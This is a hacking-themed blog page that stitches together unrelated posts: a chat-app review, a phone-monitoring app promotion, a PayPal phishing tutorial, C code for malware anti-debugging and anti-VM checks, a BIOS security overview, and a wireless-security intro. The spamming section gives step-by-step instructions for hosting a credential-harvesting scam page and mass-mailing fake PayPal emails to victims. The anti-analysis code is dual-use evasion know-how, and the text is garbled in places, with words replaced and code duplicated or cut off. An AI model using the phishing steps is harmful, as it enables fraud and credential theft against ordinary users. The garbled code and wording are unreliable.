Saturday, October 18, 2014

Encrypted mobile phone chat, video and calls with PQChat

PQChat is a free private messaging app for iPhone (Android version coming soon), protecting data with the McEliece cryptosystem and  a propietary Never-The-Same encryption algorithm from SRD Wireless, a UK company.
The app stores minimal user information, everything is encrypted before leaving the device. The user’s phone number, nickname and ID-image are stored as one way hash values, the app masterpassword and a 5 digit alphanumeric PIN are set by the user, PQChat developers don’t know what they are or read your data, if you lose your masterpassword you will lock yourself out of your account for ever, there is no backdoor.
User authentication to establish a video call or send a text message to one of your contacts employs PQChat own Man At The End patented algorithm.
PQChat mobile phone encrypted chat
PQChat mobile phone encrypted chat
The user keeps total control over the messages he sends, first by encrypting them on the phone, secondly by being able to remotely delete the messages from the server or set a timer for automatic erasing. You are protected from wire-tapping with a single use encryption algorithm, akin to perfect forward privacy. Deleting the encrypted messages strengthens your security by stopping future attempts to break the cipher and it can help you when sending a message to the wrong contact.
This is a zero knowledge app being marketed as resistant to quantum computer cipher breaking, with PQChat standing for Post-Quantum Chat. The company claims that most standard encryption will be broken in the future with yet to be made Quantum computers.
The app includes a personal locker where to store encrypted passwords and bank details, it is doubtless a much better option than WhatsApp and other popular insecure messaging apps but you need to trust that the closed source encryption algorithm is safe and as usual in this kind of apps, the receiver and the sender both need to have the app installed to be able to communicate.
If it worries you that this is a UK company that could be forced to spy on you by blanket surveillance government order, PQChat developers acknowledge that will have to comply with authorities requests to monitor a user but since they are unable to decrypt messages there wouldn’t be much they can provide.

Monitor an IPhone or an iPod with Mobile Nanny



Mobile Nanny is an extremely useful which can be used to monitor an iPhone or an iPod, With Mobile Nanny you can block, record user activity and set restrictions on your iPhone or iPod touch using MobileNanny which is a new jailbreak tweak available in cydia, Mobile Nanny s next generation Parental control software which also has an ability to block and monitor every aspect of how your Child uses your mobile phone.All of these softwares have 100% money back guarante

How it works?

The image below illustrated how Mobile Nanny work

So what are you waiting for grab your hands on one of the best iPhone monitoring softwares, Grab mobile Nanny from the link below:
Mobile Nanny Download

Learn how to Spam ~ Basic Spamming Tutorial

This stuff we need for do spamming.

1 :=> Cpannel

2 :=> MAILLER OR SMTP

3 :=> SCAM PAGE

4 :=> LEADS (email’s) 



Chapter 1

SETUP SCAM PAGE IN CPANNEL 

1 :=> The most knobs ask me how Cpanne
looks like n how I can upload scam page in Cpannel. So the
ans in here look in fig 1…..




Now you know how Cpannel look likes and
now we need to change our result email in scam page and
upload our scam page in Cpannel. Let’s see how we can do this


Changing email :=> Unzip your scam page and find the PHP file where we can change our email result. Like this as shown in fig 2




First login into Cpannel and then click Sub domain option u can see in fig 1.
Than make a sub domain and click to document root to upload your scam
page and then upload it you can see in fig 3




After click here one page will
open like this here u can upload ur scam page zip file.
As you can see in fig 4




Now we uploaded our scam page successfully. After uploaded
scam page extract your zip file from extract option.
Now we setup scamp page setup successfully here look likes.




If anyone login in this page you will found id n pass in your mail account.

CHAPTER 2 

MAIL SENDING WITH PHP INBOX MAILLER

2 :=> Open PayPal letter n change the scam page link with your
new scam page link. Like we change email address in scam page.


Now we need to send mail’s to our victims than they found your mail
and some of them login and you found your hack result. 




Now our work done our victims found our fake email’s n they think that
PayPal message to update his or her account information and they click
our scam page link. After that we found victims email n pass (login’s ) : D .




In next part I will teach you how to do with SMTP.

Monday, September 22, 2014

Anti-debugging and Anti-VM techniques and anti-emulation

Immunity debugger
C/C++ compiler (msvc or GCC)
Virtual Machine (Vmware of Vbox)

Introduction to Debuggers.

A Debugger is a piece of software used to analyze and instrument executable files. In order to analyze and intercept machine code debuggers use system calls and API commonly provided by the operating system. To intercept a single block of code, debuggers use a single stepping operation which can be turned on by setting the TRAP Flag in EFLAGS register. Debuggers use many types of breakpoints in order to stop at a particular memory address. The following are the type of breakpoints debuggers use.

1.Software Breakpoint.
2.Hardware breakpoint.
3.Memory breakpoints.
4.Conditional Breakpoints.

Software Breakpoints are the type of breakpoints where a debugger replaces the original instruction with an INT 0xcc instruction, which raises a software breakpoint interrupt routine and is returned back to the debugger to handle it. In an immunity debugger you can view your software breakpoint by pressing ALT + b

Breakpoints:

Code:
Address     Module      Active       Disassembly                           Comment
00401FF0    extracto    Always     JE SHORT extracto.00401FF7
00401FFC    extracto    Always     MOV EBP,ESP
0040200A    extracto    Always     CALL DWORD PTR DS:[<&KERNEL32.ExitPr

Hardware breakpoints use four of the debug register provided by the process in-order to incept at a particular breakpoint. These registers include DR0, DR1, DR2, DR3

We then flip the appropriate HFR in the DR7 register to enable the breakpoint and set its type and length.

After the hardware breakpoint has been set and is reached the OS raises an INT 1 interrupt the single stepping event.

Debuggers then set up appropriate handlers to catch those exceptions.

Memory Breakpoint:

In memory the breakpoint we use guard pages to set up a handler and if that page is accessed an exception handler is called.

Debuggers support many types of memory breakpoints

1.memory breakpoint on BYTE access.
2.memory breakpoint on WORD access.
3.memory breakpoint on DWORD access.

Conditional breakpoints:

Conditional breakpoints are managed by the debugger, and they are presented to users only if certain conditions are met.

For example you can set up conditional breakpoints in an immunity debugger which has the following syntax:

CONDITION = [ESP] = 0x0077ff89

Which will only be caught if the value pointed at the top of the stack is 0x0077ff89.

Memory breakpoints are only useful when you want to monitor calls to specific API with only certain parameters.

Debugging API on Windows

Windows by default provides an API for debugging which is utilized by debuggers to debug applications. The API provided by windows is known as windows debugging API.

The following is a sample code to debug an application using windows debugging API.


Code:
void EnterDebugLoop(const LPDEBUG_EVENT DebugEv)
{
DWORD dwContinueStatus = DBG_CONTINUE; // exception continuation
char buffer[100];
CONTEXT lcContext;
for(;;)
{
// Wait for a debugging event to occur. The second parameter indicates
// that the function does not return until a debugging event occurs.

WaitForDebugEvent(DebugEv, INFINITE);

// Process the debugging event code.

switch (DebugEv->dwDebugEventCode)
{
case EXCEPTION_DEBUG_EVENT:
// Process the exception code. When handling
// exceptions, remember to set the continuation
// status parameter (dwContinueStatus). This value
// is used by the ContinueDebugEvent function.

switch(DebugEv->u.Exception.ExceptionRecord.ExceptionCode)
{
case EXCEPTION_ACCESS_VIOLATION:
// First chance: Pass this on to the system.
// Last chance: Display an appropriate error.

break;

case EXCEPTION_BREAKPOINT:

if (!fChance)
{
dwContinueStatus = DBG_CONTINUE; // exception continuation
fChance = 1;

break;
}

lcContext.ContextFlags = CONTEXT_ALL;
GetThreadContext(pi.hThread, &lcContext);

ReadProcessMemory(pi.hProcess , (LPCVOID)(lcContext.Esp ),(LPVOID)&rtAddr, sizeof(void *), NULL );

if (DebugEv->u.Exception.ExceptionRecord.ExceptionAddress == pEntryPoint)
{

printf("\n%s\n", "Entry Point Reached");
WriteProcessMemory(pi.hProcess ,DebugEv->u.Exception.ExceptionRecord.ExceptionAddress,&OrgByte, 0x01, NULL);

lcContext.ContextFlags = CONTEXT_ALL;
GetThreadContext(pi.hThread, &lcContext);
lcContext.Eip--; // Move back one byte
SetThreadContext(pi.hThread, &lcContext);
FlushInstructionCache(pi.hProcess,DebugEv->u.Exception.ExceptionRecord.ExceptionAddress,1);
dwContinueStatus = DBG_CONTINUE   ; // exception continuation

putBP();
break;
}

// First chance: Display the current
// instruction and register values.
break;

case EXCEPTION_DATATYPE_MISALIGNMENT:
// First chance: Pass this on to the system.
// Last chance: Display an appropriate error.

dwContinueStatus = DBG_CONTINUE ;
break;

case EXCEPTION_SINGLE_STEP:
printf("%s", "Single stepping event ");
dwContinueStatus = DBG_CONTINUE ;
break;

case DBG_CONTROL_C:
// First chance: Pass this on to the system.
// Last chance: Display an appropriate error.
break;

default:
// Handle other exceptions.
break;
}

break;

case CREATE_THREAD_DEBUG_EVENT:

//dwContinueStatus = OnCreateThreadDebugEvent(DebugEv);
break;

case CREATE_PROCESS_DEBUG_EVENT:
printf("%s", GetFileNameFromHandle(DebugEv->u.CreateProcessInfo.hFile));
break;

case EXIT_THREAD_DEBUG_EVENT:
// Display the thread's exit code.

//dwContinueStatus = OnExitThreadDebugEvent(DebugEv);
break;

case EXIT_PROCESS_DEBUG_EVENT:

// Display the process's exit code.
return;
//dwContinueStatus = OnExitProcessDebugEvent(DebugEv);
break;

case LOAD_DLL_DEBUG_EVENT:

char *sDLLName;

sDLLName = GetFileNameFromHandle(DebugEv->u.LoadDll.hFile);

printf("\nDLl Loaded = %s Base Address 0x%p\n", sDLLName, DebugEv->u.LoadDll.lpBaseOfDll);

//dwContinueStatus = OnLoadDllDebugEvent(DebugEv);
break;

case UNLOAD_DLL_DEBUG_EVENT:
// Display a message that the DLL has been unloaded.

//dwContinueStatus = OnUnloadDllDebugEvent(DebugEv);
break;

case OUTPUT_DEBUG_STRING_EVENT:
// Display the output debugging string.

//dwContinueStatus = OnOutputDebugStringEvent(DebugEv);
break;

case RIP_EVENT:

//dwContinueStatus = OnRipEvent(DebugEv);
break;
}

// Resume executing the thread that reported the debugging event.
ContinueDebugEvent(DebugEv->dwProcessId,
DebugEv->dwThreadId,
dwContinueStatus);
}

}

int main(int argc ,char **argv)
{
DEBUG_EVENT debug_event = {0};
STARTUPINFO si;
FILE *fp = fopen(argv[1], "rb");
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );

CreateProcess ( argv[1], NULL, NULL, NULL, FALSE,
DEBUG_ONLY_THIS_PROCESS, NULL,NULL, &si, &pi );

printf("Passed Argument is %s\n", OrgName);
pEntryPoint = GetEP(fp); // GET the entry Point of the Application
fclose(fp);

ReadProcessMemory(pi.hProcess ,pEntryPoint, &OrgByte, 0x01, NULL); // read the original byte at the entry point
WriteProcessMemory(pi.hProcess ,pEntryPoint,"\xcc", 0x01, NULL); // Replace the byte at entry point with int 0xcc

EnterDebugLoop(&debug_event);  // User-defined function, not API

return 0;
}

int main(int argc ,char **argv)
{
DEBUG_EVENT debug_event = {0};
STARTUPINFO si;
FILE *fp = fopen(argv[1], "rb");
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );

CreateProcess ( argv[1], NULL, NULL, NULL, FALSE,
DEBUG_ONLY_THIS_PROCESS, NULL,NULL, &si, &pi );

printf("Passed Argument is %s\n", OrgName);
pEntryPoint = GetEP(fp); // GET the entry Point of the Application
fclose(fp);

ReadProcessMemory(pi.hProcess ,pEntryPoint, &OrgByte, 0x01, NULL); // read the original byte at the entry point
WriteProcessMemory(pi.hProcess ,pEntryPoint,"\xcc", 0x01, NULL); // Replace the byte at entry point with int 0xcc

EnterDebugLoop(&debug_event);  // User-defined function, not API

return 0;
}

Anti-debugging techniques.

Now in order to frustrate the malware analyst, malware can be DDcarder in the presence of debuggers and show up in unexpected events. In order to detect the presence of a debugger, malware can either read some values or it can use API present to detect if the malware is being debugged or not.

One of the simple debugger detection tricks includes using the winAPI function known as KERNEL32.IsDebuggerPresent.


Code:
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

int main(int argc, char **argv)
{
if (IsDebuggerPresent())
{
MessageBox(HWND_BROADCAST, "Debugger DDcarder", ""Debugger DDcarder"", MB_OK);
exit();
}
MessageBox(HWND_BROADCAST, "Debugger Not DDcarder", ""Debugger Not DDcarder"", MB_OK);
return 0;
}
Detecting a debugger using PEB:

When the process is created using CreateProcess API, and if the creation flag is set as DEBUG_ONLY_THIS_PROCESS then a special field is set in the PEB data structure in the memory


Code:
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

int __naked detectDebugger()
{
__asm
{
ASSUME FS:NOTHING

MOV EAX,DWORD PTR FS:[18]
MOV EAX,DWORD PTR DS:[EAX+30]
MOVZX EAX,BYTE PTR DS:[EAX+2]
RET

}
}

int main(int argc, char **argv)
{
if (detectDebugger())
{
MessageBox(HWND_BROADCAST, "Debugger DDcarder", ""Debugger DDcarder"", MB_OK);
exit();
}
MessageBox(HWND_BROADCAST, "Debugger Not DDcarder", ""Debugger Not DDcarder"", MB_OK);
return 0;
}

Detection using HEAP flags:

When a program is run under a debugger, and is created using the debug process creation flags. The heap flags are changed. These Flags exit at a different location depending upon the version of the operating system.

On Windows NT based systems these flags exist at 0x0c offset from heap base.

ON Windows Vista based systems and later they exist at location 0x40 offset from the heap base.

These two flags initialized are 'Force flags' and 'flags'.

ProcessHeap Base Points towards a _HEAP structure are defined as:

Reference :struct HEAP

Code:
typedef struct _HEAP
{
     HEAP_ENTRY Entry;
     ULONG SegmentSignature;
     ULONG SegmentFlags;
     LIST_ENTRY SegmentListEntry;
     PHEAP Heap;
     PVOID BaseAddress;
     ULONG NumberOfPages;
     PHEAP_ENTRY FirstEntry;
     PHEAP_ENTRY LastValidEntry;
     ULONG NumberOfUnCommittedPages;
     ULONG NumberOfUnCommittedRanges;
     WORD SegmentAllocatorBackTraceIndex;
     WORD Reserved;
     LIST_ENTRY UCRSegmentList;
     ULONG Flags;
     ULONG ForceFlags;
     ULONG CompatibilityFlags;
     ULONG EncodeFlagMask;
     HEAP_ENTRY Encoding;
     ULONG PointerKey;
     ULONG Interceptor;
     ULONG VirtualMemoryThreshold;
     ULONG Signature;
     ULONG SegmentReserve;
     ULONG SegmentCommit;
     ULONG DeCommitFreeBlockThreshold;
     ULONG DeCommitTotalFreeThreshold;
     ULONG TotalFreeSize;
     ULONG MaximumAllocationSize;
     WORD ProcessHeapsListIndex;
     WORD HeaderValidateLength;
     PVOID HeaderValidateCopy;
     WORD NextAvailableTagIndex;
     WORD MaximumTagIndex;
     PHEAP_TAG_ENTRY TagEntries;
     LIST_ENTRY UCRList;
     ULONG AlignRound;
     ULONG AlignMask;
     LIST_ENTRY VirtualAllocdBlocks;
     LIST_ENTRY SegmentList;
     WORD AllocatorBackTraceIndex;
     ULONG NonDedicatedListLength;
     PVOID BlocksIndex;
     PVOID UCRIndex;
     PHEAP_PSEUDO_TAG_ENTRY PseudoTagEntries;
     LIST_ENTRY FreeLists;
     PHEAP_LOCK LockVariable;
     LONG * CommitRoutine;
     PVOID FrontEndHeap;
     WORD FrontHeapLockCount;
     UCHAR FrontEndHeapType;
     HEAP_COUNTERS Counters;
     HEAP_TUNING_PARAMETERS TuningParameters;
} HEAP, *PHEAP;

Following the C program can be used to detect the presence of a debugger using heap flags

Code:
int main(int argc, char* argv[])
{
    unsigned int var;
    __asm
    {
        MOV EAX, FS:[0x30];
        MOV EAX, [EAX + 0x18];
        MOV EAX, [EAX + 0x0c];
        MOV var,EAX
    }

    if(var != 2)
    {
        printf("Debugger DDcarder");
    }
    return 0;
}

Virtual Machine Detection or Emulation Detection.

Malware samples are usually analyzed by analysts in an isolated environment such as Virtual Machine. In order to thwart the analysis of samples inside a virtual machine malware include anti-vm protection or they simply exit when malware is run in an isolated environment.

The following techniques can be used to detect if a sample is running inside a VM.

Timing Based.
Artifacts based.

Timing based detection

"The Time Stamp Counter (TSC) is a 64-bit register present on all x86 processors since the Pentium. It counts the number of cycles since reset". (Wikipedia)

If the code is being emulated then, there will be change in the time stamp between.

The Result in stored in EDX:EAX format

Now the time difference in a real host machine would be usually less than 100, but if the code is emulated the difference will be huge.


Code:
int main(int argc, char* argv[])
{
    unsigned int time1 = 0;
    unsigned int time2 = 0;
    __asm
    {
        RDTSC
        MOV time1,EAX
        RDTSC
        MOV time2, EAX

    }
    if ((time2 - time1) > 100)
    {
        printf("%s", "VM DDcarder");
        return 0;
    }
    printf("%s", "VM not present");
    return 0;
}

The above program uses time stamp instruction to detect the presence of Virtual Machine.

Artifact Based Detection.

Malwares leverage on the presence of Virtual Machine configuration based on file, network or device artifacts. Malwares usually check the presence of these artifacts to detect the presence of a debugger or Virtual Environment.

The best case would be registry artifacts, Vmware creates registry keys for Virtual Disk Controller, which can be located in registry using the following key.

HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum\0
as "SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S&Rev_1.0\4&XXX&XXX"


Code:
int main(int argc, char **argv)
{

char lszValue[100];
   HKEY hKey;
   int i=0;
    RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum", 0L, KEY_READ , &hKey);

    RegQueryValue(hKey,"0",lszValue,sizeof(lszValue));

    printf("%s", lszValue);
    if (strstr(lszValue, "VMware"))
    {
        printf("Vmware DDcarder");

Anatomy of BIOS Security

Anatomy of BIOS Security
Introduction

Computer security has become much harder to manage in recent years, and this is due to the fact that attackers continuously come up with new and more effective ways to attack our systems. As attackers become increasingly sophisticated we as security professionals must ensure that they do not have free reign over the systems that we are hired to protect. An attack vector that many people forget to consider is the boot process itself which is almost completely controlled by the BIOS.

The BIOS is a privileged piece of software that is generally ignored by day to day users and thus they are usually unable to comprehend the importance of it in our computers. The Basic Input/Output System was first invented by Gary Kildall for use in his operating system CP/M and this became what we now know as the conventional BIOS system. The BIOS appeared in IBM compatible PC’s around 1975 and was used extensively in the CP/M operating system. This was later used in the MSDOS systems where it was known as DOS BIOS. These systems were only responsible for basic pre boot hardware initializations before handing over control to the bootloader. This was fine thirty years ago, when software was simpler and attacks were not very predominant, thus the BIOS itself was not designed with security in mind. However in today’s world this is no longer the case. BIOS security lacks several features that make it vulnerable to external attack.

These are carried out against BIOS systems:
some notable attacks
Chernobyl Attack (1998) – Also known as CIH or Spacefiller was the first major attack on BIOS systems. This virus installs on the windows memory and hooks into file access calls and infects all the currently executing programs. Then the virus tries to flash the BIOS rom by filling it with zeros. The other payload infects the Master Boot Record (MBR) by filling the first megabyte of the hard disk with zeros.

Mebromi (2012) – Is made up of a BIOS rootkit, MBR rootkit, Trojan downloader and PE infector. This Trojan deletes a specific registry value and checks for the BIOS manufacturer. If it’s Award BIOS, it then infects the BIOS ROM and in turn infects the Master BOOT Record (MBR) and alters it allowing the execution of an infected program at each Operating System start-up.

We attempt to prevent such attacks by outlining several attack vectors and also suggest several mechanisms for the mitigation of attacks against the BIOS.

BIOS (Basic Input Output System)

[Image: 073113_1327_AnatomyofBI1.jpg]

Basic Input/Output System (BIOS), also known as the system BIOS or ROM BIOS is a standard defining a firmware interface. BIOS software is built into the PC, and is the first software run by a PC when powered on. The fundamental purposes of the BIOS are to initialize and test the system hardware components, and to start the boot loader or an operating system from a secondary storage device. It also takes care of essential system functions such as power management and temperature regulation. It provides an abstraction layer for the underlying hardware by providing a consistent way for operating systems & application programs to interact with various input/output devices.

Changes in system hardware are abstracted by the BIOS from programs that use BIOS services instead of directly accessing the hardware. BIOS software is stored on a non-volatile ROM chip on the motherboard. Its unique design makes it compatible for particular models of computer, interfacing with various devices that make up the complementary chipset of the system. In modern PC’s the BIOS contents are stored on an EEPROM chip.

An EEPROM chip or Electronically Erasable Programmable Read only memory is a type of non-volatile memory used by many electronic devices that requires small amounts of data to be stored for quick access. The contents of an EEPROM chip can be flashed i.e. they can be overwritten with new data. This allows BIOS software to be easily upgraded to add new features and bug fixes. This feature is also one of the reasons that BIOS chipsets are vulnerable to attack. A BIOS screen looks like this:

Why BIOS is in Blue colour?

Most BIOS Screens will be Blue in colour, this is due to how the BIOS Manufacturers implement general BIOS colour attributes. BIOS Colour Attributes are 8 bit values where the lower 4 HFR represent the character colour and the higher 4 HFR represent the background colour. In BIOS, to print a white character in blue background the ‘BIOS colour attribute’ would be set to a hexadecimal value of 0x1F.

Under certain conditions, setting the highest bit of the background colour may cause the text to blink instead of making the background colour intensified. In this context the highest bit of the background colour should be kept low according to the BIOS colour attribute distribution. As a result the Blue colour which comprises value ’1′ in hexadecimal is generally used for an uninterrupted BIOS display with intensified background with clear text.

[Image: 073113_1327_AnatomyofBI2.jpg]

Top BIOS Manufacturers

BIOS software is developed by several companies around the world and are usually deeply integrated with the system motherboard. Several of the most popular BIOS manufacturers are:

American Mega Trends
WinBound
Phoenix
AMI
ASUS
Compaq
IBM
Award

Role of BIOS

The BIOS has an essential role in the boot process of the computer also known as bootstrapping. It initializes system hardware manages ACPI and regulates CPU temperatures during the booting process. The major responsibilities of the BIOS are listed below:

1.Establish Trust: The BIOS is responsible for verifying the integrity of all the hardware components in the system and also to authenticate them before use. This is done with the help of Core Root of Trust Measurement (CRTM), which basically checks if the hardware is valid and that its integrity has not been compromised.

2.Test Hardware: The secondary functionality of the BIOS is to initialize and test the hardware present on the computer before it’s used. Hardware such as the motherboard, chipset and memory are included in this test. This is generally carried out during POST (Power-On-Self-Test).

3.Load additional Modules: Several devices present on the computer may require additional firmware for its proper functioning. The BIOS ensures that such additional firmware modules are loaded and executed. These may be stored in the BIOS chip itself or some secondary storage device.

4.Boot Device Selection: After the above steps have been carried out the BIOS starts to detect a valid boot device e.g. USB drives, Hard disk etc. Once such a device has been found it executes the bootloader found on that device.

5.Start Operating System: After this the actual bootstrapping process begins, the bootloader starts to execute and begins to load the OS kernel into memory. Once the kernel has been initialized the BIOS transfers full control to the Operating System.

BIOS Overview

System BIOS can be of two types namely

Legacy BIOS
[Image: 073113_1327_AnatomyofBI3.png]
BIOS based upon the UEFI specification

Conventional BIOS (Legacy BIOS)

The Legacy BIOS or conventional BIOS is the tried and true BIOS type which has been around for years. It’s generally a 16bit program that is flashed onto a ROM chip and placed in the motherboard of the computer. This type of BIOS is very outdated and more vulnerable to attack therefore it’s advisable to use a newer and more stable specification.

The key component in conventional BIOS is a boot block. This part is logically separated from other parts of the BIOS and initially executed during the BIOS boot process. Then the boot block checks the integrity of remaining firmware in BIOS and if any is corrupted, then recovers those. The boot block then initializes almost all the hardware’s associated with system by using a Power-On-Self-Test (POST). During this procedure low level hardware components like Memory, CPU, Chipset etc. are initialized.

After this process, it then loads other option ROMS like Video Cards, SCSI Controller Cards, and Network Boot ROM etc. that has its own BIOS software. This Option ROMS could inform the BIOS about its functionality, and then it could be called later on the boot process depending on the order the user had selected. Then the BIOS checks the Master BOOT Record (MBR) in the order of the boot devices priority. If any storage device has a valid data that relates to MBR, then it is selected. MBR then points to a corresponding boot loader of an operating system and thus in turns loads the operating system.

In conventional Boot process System Management Mode (SMM) can be initiated by using SMI handlers and ACPI table’s code. System Management Mode is a 32-bit mode which runs on high-privileged mode that can override almost all the hardware security mechanisms of protected mode. In order to change to SMM mode BIOS load SMI handlers and initializes the ACPI tables and codes

Legacy BIOS Boot Process

When a computer is first powered on the BIOS is the first piece of software that is executed, the boot block then executes a POST (Power-On-Self-Test) thereby ensuring that all the hardware on the system is valid and accounted. After the POST screen the user has the option to load the BIOS screen or to continue booting the current Operating System instead, this is done by pressing a pre-designated key on the keyboard this key may vary depending on the BIOS manufacturer. The BIOS then checks if any additional pieces of firmware have to be loaded for individual devices on the computer if so, then these modules are loaded and executed.
[Image: 073113_1327_AnatomyofBI4.png]

Unified Extensible Firmware Interface (UEFI)

UEFI (Unified Extensible Firmware Interface) is a specification that was first designed by Intel in the 1990 for its Itanium range of computer systems. It was originally called the EFI specification and was intended to be a better replacement for legacy BIOS systems. UEFI has several advantages over the conventional BIOS and is radically different from these older systems.

The UEFI specification defines a programmable software interface that lies between the device firmware and the Operating system. It provides an almost OS like interface to device firmware. Depending on the manufacturer it may lie on top of the BIOS but it is generally place in the /EFI/ directory on some form of non-volatile memory. This may either be a NAND chip on the motherboard, a hard drive or even on a network share.
[Image: 073113_1327_AnatomyofBI5.png]

Differences between UEFI and Legacy BIOS

There are several differences between conventional BIOS and UEFI systems many of them add greater functionality and power to the computer. It also provides a more efficient and secure booting mechanism.

1.Larger Address Space: Conventional BIOS were forced to work in 16bit mode with a maximum of 1mb addressable space. UEFI allows running in 32 and 64bit mode allowing larger and more sophisticated programs to be run by the UEFI.

2.Support for Larger File Systems: Traditional BIOS only supports booting of disks which have MBR partitions. MBR partitioning schemes only support 4 partitions per disk and a maximum size of 2TB. UEFI supports the booting of GPT partitions (GUID partitions) which allow the booting of extremely large disks up to 8Zb.

3.Improved Security Capabilities: The UEFI specification also improves upon the security aspects of the older BIOS systems. It supports several security features such as secure boot, it also has provisions for providing basic cryptographic and public key infrastructure.

4.CPU independent design: UEFI has employed a CPU independent design methodology, i.e. it can run on many different types of architectures. The code is available is compiled differently for the required platform.

5.Powerful Execution Environment: The UEFI specification provides a much more powerful execution environment for computers. It allows special features such as booting over a network, using the mouse, ACPI control and even browsing the web.

6.Improved Performance: UEFI compliant operating systems have been seen to have a significant performance boost not just during the boot process but also during running and powering off the system.

Windows 8 uses UEFI

UEFI though supported by several operating system vendors for years has not seen widespread adoption until the release of Windows 8. Windows 8 has tried to incorporate the best parts of UEFI into their latest operating system release particularly the secure boot feature.

Secure Boot

One of UEFI’s most interesting features is called Secure Boot, which allows you to boot only an authenticated OS kernel. Windows 8 relies heavily on this method to ensure that only authenticated firmware with a validated kernel image can be booted. This is quite different from older bootstrapping methodologies where any kind of bootloading code can be loaded and executed by the BIOS.

In secure a boot before the BIOS gives full control to the OS, bootloader makes sure that the firmware has been signed. This is done with the help of cryptographic signatures that are embedded on the firmware by the OEM. During the boot process the firmware will compare the platform key with the key present in the firmware of each device. This comparison is carried out between a database of authenticated valid keys, if the key is allowed then the firmware is allowed to execute otherwise it is rejected.

[Image: 073113_1327_AnatomyofBI6.png]


This allows only authenticated devices to be loaded and ensures that malicious bootloader code is not loaded and executed. The safe boot mechanism in windows 8 significantly reduces the chances of boot sector viruses and bootkits from launching and affecting the boot process of the machine.

UEFI Boot Process

The UEFI boot process is much like the boot process in conventional BIOS with a few minor changes. The process is divided into stages which take place sequentially and ends with the complete handover of control to the operating system. UEFI booting runs in 32 bit or 64 bit protected mode on the CPU not in 16bit mode unlike legacy BIOS.

UEFI also starts with a small amount of code that begins the execution of the entire booting process this phase is called the Security phase (SEC) and it acts as the core root of trust. This is followed by the Pre-EFI initialization (PEI) this mode is similar to the Legacy bios pre boot initialization phase in which device firmware is checked before boot. Then the Driver execution environment is started where the actual initialization of extra device drivers takes place, devices such as network cards and graphic cards are checked in this phase.

The boot device is selected during the BDS (Boot Device Selection) phase. This then transfers control to the bootloader that is located in a GPT partition, the bootloader handles the loading of the OS kernel into memory.

[Image: 073113_1327_AnatomyofBI7.png]

Common BIOS Threats

BIOS is always written to a non-volatile storage device such as an EEPROM, this allows the contents of the ROM to be overwritten to introduce bug fixes and updates for the particular BIOS version. However this also has great potential for misuse such that, malicious programs may also have the ability to modify the contents of the ROM disk if given enough access.

User Initiated Attack

This type of attack is carried out by end user who uses an unauthenticated file to update the bios. This can be carried out by an end user who doesn’t have prior knowledge about the update file or a user with malicious intent.

Malware Attack
Malware attacks can be used to exploit vulnerability in bios. The attacker opens a backdoor to system and cause a bios crash using a vulnerable update version of bios.

Network Based or Organisational Attack

This is the large scale and crucial attack on organisational basis. An attacker who gets access to a compromised update server can carry out an organisational wide attack and infect all systems by rolling out all authorised bios versions to malicious ones.

How do we mitigate common BIOS Threats

This section describes the security measures that an organisation should implement in order to secure the BIOS. Since vulnerability in BIOS is crucial point to a system, it is important that every organisation should follow predefined guidelines to secure the BIOS structure. The following method can be implemented in an enterprise structure to enhance BIOS security

In order to overcome the malicious attacks on BIOS, we can implement following methods:

• Digital Authentication Method
• Rollback Prevention Method
• Physical Authentication Method


Automated Authentication Method
In this method, the authenticity of BIOS can be ensured through digital signatures. Here bios updates should only be installed if its authenticity is verified. Here, digital signature embedded update images by BIOS manufactures will be the last level of authorisation. This process can be automated by using a signature verification algorithm that ensures the validity of the digital signatures. This digital authentication method must be integrated by providing strong security features.

Rollback Prevention Method
Implement a mechanism that ensures the update images of BIOS such that, it should not be rolled back to previous versions. This method ensures that if an update image is to be installed, it should be ensured that its version number is greater than the current one. This can ensure that the bios version is not roll backed to a previous image that contains vulnerability.

But in some cases if the current higher version has to be rolled back to a previous lesser version. i.e., if the current updated version of the bios contains vulnerability and there are no higher version updates to be installed and the earlier lesser version is stable than the current one. In this case the corresponding authority has to ensure that lesser version do not contain any vulnerability.


Physical Authentication Method
This method provides the authenticity of updated images by ensuring the physical presence of the corresponding authority (system administrator). Here the authorities can verify the update images and update the BIOS, if the image is a valid one. This method can be used as a subsidiary to digital authentication method by providing as a recovery mechanism in situations like bios crash.     

Hack Wireless

hack Wireless
Wireless networks are everywhere; they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network? I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. Many sources said it was easy, few said it was hard.
How a wireless network works
A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients.
Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with.
The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Every BSS has an Identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with every NIC.
For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSID to let the clients know that an AP is in range.
Data streams, known as packets, are sent between the Access Point, and it’s clients. You need no physical access to the network or its wires to pick up these packets, just the right tools. It is with the transmission of these packets that pose the largest security threat to any wireless network.
Wireless Encryption
The majority of home and small business networks are encrypted using the two most popular methods:
WEP
WPA
WEP – Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128, and 256 HFR, known as WEP 64, WEP 128, and WEP 256 respectively. WEP provides a casual level of security but is more compatible with older devices; therefore, it is still used quite extensively. Each WEP key contains a 24 bit Initialization Vector (IV), and a user-defined or automatically generated key; for instance, WEP 128 is a combination of the 24 bit IV and a user entered 26 digit hex key. ((26*4)+24=128)
WEP also comes in WEP2 and WEP+, which are not as common and still as vulnerable as the standard WEP encryption.
WPA – WiFi Protected Access – comes in WPA and WPA2, and was created to resolve several issues found in WEP. Both provide you with good security; however, they are not compatible with older devices and therefore not used as widely. WPA was designed to distribute different keys to each client; however, it is still widely used in a (not as secure) pre-shared key (PSK) mode, in which every client has the same passphrase.
